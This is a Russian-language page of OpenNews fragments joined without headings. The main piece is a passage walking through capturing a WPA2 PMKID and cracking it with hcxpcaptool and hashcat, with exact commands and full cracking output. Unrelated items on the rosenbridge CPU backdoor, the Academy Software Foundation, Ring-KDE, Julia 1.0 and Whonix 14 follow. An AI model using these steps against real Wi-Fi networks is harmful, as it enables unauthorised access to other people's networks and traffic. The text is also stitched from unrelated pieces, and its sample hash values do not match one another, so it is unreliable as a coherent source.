    [13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]

В случае если точка доступа поддерживает отправку PMKID будет выведено сообщение "FOUND PMKID". Из-за помех перехват может не получиться с первого раза, поэтому рекомендуется запускать hcxdumptool в течение приблизительно 10 минут.

Запускаем утилиту hcxpcaptool для преобразования перехваченного дампа из формата pcapng в формат для разбора в hashcat.

   ./hcxpcaptool -z test.16800 test.pcapng

    start reading from test.pcapng

    summary:
    --------
    file name....................: test.pcapng
    file type....................: pcapng 1.0
    file hardware information....: x86_64
    file os information..........: Linux 4.17.11-arch1
    file application information.: hcxdumptool 4.2.0
    network type.................: DLT_IEEE802_11_RADIO (127)
    endianess....................: little endian
    read errors..................: flawless
    packets inside...............: 66
    skipped packets..............: 0
    packets with FCS.............: 0
    beacons (with ESSID inside)..: 17
    probe requests...............: 1
    probe responses..............: 11
    association requests.........: 5
    association responses........: 5
    authentications (OPEN SYSTEM): 13
    authentications (BROADCOM)...: 1
    EAPOL packets................: 14
    EAPOL PMKIDs.................: 1

    1 PMKID(s) written to test.16800

Содержимое записанного файла включает строки вида "2582a81d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465af3a", которые содержат шестнадцатеричные значения PMKID, MAC AP,MAC Station и ESSID.

Дополнительно при запуске hcxpcaptool можно использовать опции "-E", "-I" и '-U" для анализа наличия паролей, идентификаторов и имён пользователей в беспроводном трафике:

   ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

Запускаем hashcat для подбора пароля (применяется режим 16800):

   ./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'

    hashcat (v4.2.0) starting...

    OpenCL Platform #1: NVIDIA Corporation
    ======================================
    * Device #1: GeForce GTX 1080, 2028/8112 MB allocatable, 20MCU
    * Device #2: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
    * Device #3: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
    * Device #4: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU

    Hashes: 1 digests; 1 unique digests, 1 unique salts
    Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

    Applicable optimizers:
    * Zero-Byte
    * Single-Hash
    * Single-Salt
    * Brute-Force
    * Slow-Hash-SIMD-LOOP

    Minimum password length supported by kernel: 8
    Maximum password length supported by kernel: 63

    Watchdog: Temperature abort trigger set to 90c

    2582573161c61*4604d4e*89acf0e761f4*ed4824639f3a:hashcat!

    Session..........: hashcat
    Status...........: Cracked
    Hash.Type........: WPA-PMKID-PBKDF2
    Hash.Target......: 2582a8281d0e61c61*4604ba734d4e*89acf...a39f3a
    Time.Started.....: Sun Aug 12 12:51:38 2018 (41 secs)
    Time.Estimated...: Sun Aug 12 12:52:19 2018 (0 secs)
    Guess.Mask.......: ?l?l?l?l?l?lt! [8]
    Guess.Queue......: 1/1 (100.00%)
    Speed.Dev.#1.....:   408.9 kH/s (103.86ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#2.....:   408.6 kH/s (104.90ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#3.....:   412.9 kH/s (102.50ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#4.....:   410.9 kH/s (104.66ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
    Speed.Dev.#*.....:  1641.3 kH/s
    Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
    Progress.........: 66846720/308915776 (21.64%)
    Rejected.........: 0/66846720 (0.00%)
    Restore.Point....: 0/11881376 (0.00%)
    Candidates.#1....: hariert! -> hhzkzet!
    Candidates.#2....: hdtivst! -> hzxkbnt!
    Candidates.#3....: gnxpwet! -> gwqivst!
    Candidates.#4....: gxhcddt! -> grjmrut!
    HWMon.Dev.#1.....: Temp: 81c Fan: 54% Util: 75% Core:1771MHz Mem:4513MHz Bus:1
    HWMon.Dev.#2.....: Temp: 81c Fan: 54% Util:100% Core:1607MHz Mem:4513MHz Bus:1
    HWMon.Dev.#3.....: Temp: 81c Fan: 54% Util: 94% Core:1683MHz Mem:4513MHz Bus:1
    HWMon.Dev.#4.....: Temp: 81c Fan: 54% Util: 93% Core:1620MHz Mem:4513MHz Bus:1

1. OpenNews: Программа подбора паролей hashcat стала открытой
2. OpenNews: OpenBSD отключает WEP и WPA1 по умолчанию
3. OpenNews: Атака против WPA2, позволяющая перехватить трафик в WiFi-сети
4. OpenNews: Опубликована технология защиты беспроводных сетей WPA3
5. Проверка безопасности беспроводной сети WPA/WPA2 при помощи Aircrack-ng и Hashcat

Обычно бэкдор деактивирован и требует для активации наличие доступа к нулевому кольцу защиты, но исследователь обнаружил, что на некоторых системах по умолчанию бэкдор активен и может применяться для модификации непривилегированным пользователем любых областей памяти, в том числе памяти ядра. Для проверки своих систем на предмет наличия бэкдора и его отключения, а также для анализа других возможных бэкдоров в процессорах подготовлен набор утилит и модулей ядра.

Бэкдор представляет собой дополнительное вычислительное ядро, встроенное в процессор в дополнение к основному ядру CPU. Если основное процессорное ядро обеспечивает выполнение инструкций x86, то бэкдор оформлен как сопроцессор со своим набором инструкций. Включение и выключение сопроцессора с бэкдором производится через установку специального управляющего бита через регистр MSR (model-specific-register) с последующим выполнением специальной процессорной инструкции.

После активации появляется возможность выполнения инструкций на сопроцессоре, не ограниченных текущей системой привилегий основного процессора (проверка привилегий не выполняется) и работая в обход механизма защиты памяти. Передача команд для выполнения на сопроцессоре осуществляется через инкапсуляцию в специально оформленные x86 инструкции "bound".

Отмечается, что выявленный бэкдор, которому присвоено кодовое имя "rosenbridge", кардинально отличается от таких технологий, как ME (Management Engine) или PSP (Platform Security Processor), так как он более глубоко встроен, чем любой известный сопроцессор и имеет доступ не только ко всей памяти процессора, но и к процессорным регистрам и конвейеру выполнения.

1. OpenNews: Компания AMD подтвердила наличие уязвимостей в своих чипах
2. OpenNews: Уязвимость в процессорах AMD, позволяющая получить контроль над TPM-окружением
3. OpenNews: Выявлена скрытая возможность отключения подсистемы Intel ME
4. OpenNews: Эндрю Таненбаум поблагодарил Intel за использование MINIX в прошивке Management Engine 11
5. OpenNews: Серия критических уязвимостей в Intel Management Engine

Сообща данные компании намерены продвигать открытое ПО, помогать студиям в вопросах с применением открытых лицензий, управлять совместными открытыми проектами и развивать открытые технологии для создания изображений, визуальных эффектов, анимации и звука. Создание Academy Software Foundation стало итогом двухлетней совместной работы Киноакадемии и Linux Foundation, в ходе которой был проанализирован опыт применения открытого ПО в Голливуде. В результате стало ясно, что 80% голливудских студий и вовлечённых в киноиндустрию компаний применяют открытое ПО для решений тех или иных задач.

Ключевые цели Academy Software Foundation:

• Предоставление нейтральной площадки для координации взаимодействия между разными проектами, обмена ресурсами и накопления передового опыта в областях, связанных с медиаиндустрией и кинопроизводством;
• Разработка открытой платформы непрерывной интеграции и сборочной инфраструктуры для создания эталонных сборок и упрощения выявления проблем;
• Предоставление независимым разработчикам и компаниям простого пути для участия в разработке и передаче кода;
• Оптимизация разработки сборочных и runtime окружений, благодаря созданию типовых сборочных конфигураций, скриптов и рекомендаций;
• Обеспечение качества и совместимости применяемых лицензий за счёт разработки типовых схем лицензирования.

Новая версия Ring-KDE по сути является новым полностью переписанным приложением, предлагающим иной интерфейс пользователя и построенным на базе более современных технологий, таких как QtQuick2 и адаптивный набор виджетов KDE Kirigami. В новой версии также обеспечена полноценная поддержка управления с сенсорных экранов.

В интерфейсе совершения звонка добавлено отображение наиболее релевантных адресатов по мере набора имени абонента. Добавлена поддержка вызова сразу нескольких абонентов, перевода звонка в режим ожидания и создания архивной записи разговора. Существенно улучшена поддержка видеозвонков, предоставления совместного доступа к экрану и передачи файлов.

Помимо лога в форме чата представлена концепция навигации по шкале времени, позволяющая просматривать историю голосовых вызовов, видеозвонков, сообщений и другой активности пользователя. Центральным звеном системы навигации теперь является поисковая строка, позволяющая быстро найти адресата по части его имени. По умолчанию изменения и содержимое личной адресной книги сохраняется только на локальной системе и не передаётся в облако. Имеется опция для кэширования содержимого глобальной адресной книги.

Также можно отметить новый выпуск основной платформы Ring, в котором добавлены функции записи видео- и аудиовызовов, реализована поддержка push-уведомлений, проведена работа по улучшению качества, безопасности и стабильности. Напомним, что платформа Ring позволяет передавать сообщения без обращения к внешним серверам через организацию прямого P2P-соединения между пользователями с применением оконечного шифрования (End-to-end, ключи присутствуют только на стороне клиента) и аутентификации на основе сертификатов X.509.

Поддерживается защищённый обмен сообщениями, голосовые и видео-звонки, телеконференции, отправка файлов, совместный доступ к файлам и содержимому экрана. Для идентификации пользователя в Ring применяется децентрализованный глобальный механизм аутентификации учётных записей, основанный на реализации адресной книги в форме блокчейна (применяются наработки проекта Ethereum). Для адресации пользователей в Ring применяется протокол OpenDHT (распределённая хэш таблица), без применения централизованных реестров c информацией о пользователях.

1. OpenNews: Выпуск децентрализованного коммуникационного клиента Ring 1.0
2. OpenNews: Децентрализованный коммуникационный клиент Ring присоединился к проекту GNU
3. OpenNews: Доступна система обмена сообщениями Briar, способная работать в режиме P2P
4. OpenNews: Проект Tox развивает свободную альтернативу Skype
5. OpenNews: Завершено открытие серверной части сервиса мгновенного обмена сообщениями Wire

Ключевые особенности языка:

• Высокая производительность: одной из ключевых целей проекта является достижение производительности близкой к программам на языке Си. Компилятор Julia основан на наработках проекта LLVM и генерирует эффективный нативный машинный код для многих целевых платформ;
• Поддержка различных парадигм программирования, включая элементы объектно-ориентированного и функционального программирования. Стандартная библиотека предоставляет в том числе функции для асинхронного ввода/вывода, управления процессами, ведения логов, профилирования и управления пакетами;
• Динамическая типизация: язык не требует явного определения типов для переменных по аналогии со скриптовыми языками программирования. Поддерживается интерактивный режим работы;
• Опциональная возможность явного указания типов;
• Синтаксис, превосходно подходящий для численных вычислений, научных расчётов, систем машинного обучения и визуализации данных. Поддержка многих числовых типов данных и средства для распараллеливания вычислений.
• Возможность прямого вызова функций из библиотек на языке Си без дополнительных прослоек.

Кроме стабилизации языка в Julia 1.0 также представлено несколько новшеств, среди которых новый встроенный пакетный менеджер Pkg, позволяющий не только манипулировать репозиториями и устанавливать пакеты и связанные с ними зависимости, но и создавать привязанные к проектам окружения пакетов, записывать и воссоздавать состояние работающего приложения, использовать приватные пакеты. Для переменных добавлено новое значение "missing", определяющее отсутствующее значение. Встроенный тип String адаптирован для хранения произвольных данных. Добавлена поддержка именованных кортежей (похожи на хэши в Perl). Добавлена возможность переопределения оператора "точка". Расширены возможности оптимизатора.

1. OpenNews: Новый открытый динамический язык программирования Julia, использующий наработки проекта LLVM
2. OpenNews: Компания Apple выпустила язык программирования Swift 4.1
3. OpenNews: Новая версия языка программирования Nim 0.18.0
4. OpenNews: Релиз динамического языка программирования Groovy 2.5
5. OpenNews: Выпуск языка программирования Dart 2.0

Дистрибутив основан на Debian GNU/Linux и использует Tor для обеспечения анонимности. Особенностью Whonix является разделение дистрибутива на два отдельно устанавливаемых компонента - Whonix-Gateway с реализацией сетевого шлюза для анонимных коммуникаций и Whonix-Workstation с рабочим столом. Выход в сеть из окружения Whonix-Workstation производится только через шлюз Whonix-Gateway, что изолирует рабочее окружение от прямого взаимодействия с внешним миром и допускает использование только фиктивных сетевых адресов. Подобный подход позволяет защитить пользователя от утечки реального IP-адреса в случае взлома web-браузера и даже при эксплуатации уязвимости, дающей атакующему root-доступ к системе.

Взлом Whonix-Workstation позволят атакующему получить только фиктивные сетевые параметры, так как реальный IP и параметры DNS скрыты за границей сетевого шлюза, который направляет трафик только через Tor. При этом следует учитывать, что компоненты Whonix рассчитаны на запуск в форме гостевых систем, т.е. не исключена возможность эксплуатации критических 0-day уязвимостей в платформах виртуализации, которые могут предоставить доступ к хост-системе. В связи с этим, не рекомендуется запускать Whonix-Workstation на том же компьютере, что и Whonix-Gateway.

В Whonix-Workstation по умолчанию предоставляется пользовательское окружение KDE. В поставку включены такие программы, как VLC, Tor Browser (Firefox), Thunderbird+TorBirdy, Pidgin и т.д. В поставке Whonix-Gateway можно найти набор серверных приложений, в том числе Apache httpd, ngnix и IRC-серверы, которые могут использоваться для организации работы скрытых сервисов Tor. Возможен проброс поверх Tor туннелей для Freenet, i2p, JonDonym, SSH и VPN. Сравнение Whonix с Tails, Tor Browser, Qubes OS TorVM и corridor можно найти на данной странице. При желании, пользователь может обойтись только Whonix-Gateway и подключить через него свои обычные системы, в том числе Windows, что даёт возможность обеспечить анонимный выход для уже находящихся в обиходе рабочих станций.

Основные новшества:

• Пакетная база дистрибутива обновлена до Debian 9 (stretch);
• Прекращено формирование 32-разрядных сборок, начиная с Whonix 14 теперь публикуются только 64-разрядные сборки (amd64);
• Добавлен новый мастер настройки анонимного соединения Anon Connection Wizard для упрощения подключения к сети Tor через Tor bridge или прокси (выполняет функции похожие на Tor-launcher);
• Добавлена поддержка Tor-транспорта meek_lite, существенно упрощающего подключение к tor в странах с жесткой цензурой. Для обхода блокировок транспорт meek использует проброс через крупные СDN и облачные платформы, такие как Microsoft Azure;
• В поставку по умолчанию добавлено приложение Onioncircuits с реализацией GTK-интерфейса для наглядного отображения цепочек и потоков Tor;
• Из Tails перенесена программа onion-grater для обеспечения совместимости OnionShare, Ricochet и Zeronet с Whonix;
• В качестве приоритетных источников загрузки обновлений теперь используются onion-сервисы;
• Примерно на 35% сокращён размер образов для VirtualBox (.ova) и KVM (.qcow2), благодаря применению zerofree;
• Инструментарий Tor обновлён до выпуска 3.3.3.7. Обеспечена полная поддержка третьей версии протокола скрытых сервисов;
• Реализован пакет grub-live, позволяющий запустить Whonix в качестве live-системы на платформах, отличных от Qubes-Whonix;
• Для повышения защищённости усилены профили AppArmor для Tor Browser, obfsproxy и других приложений.

1. OpenNews: Выпуск Whonix 13, дистрибутива для обеспечения анонимных коммуникаций
2. OpenNews: Выпуск Whonix 12, дистрибутива для обеспечения анонимных коммуникаций
3. OpenNews: Выпуск Whonix 11, дистрибутива для обеспечения анонимных коммуникаций
4. OpenNews: Проект Qubes выступил с новой инициативой сертификации безопасных ноутбуков
5. OpenNews: Релиз ОС Qubes 4.0, использующей виртуализацию для изоляции приложений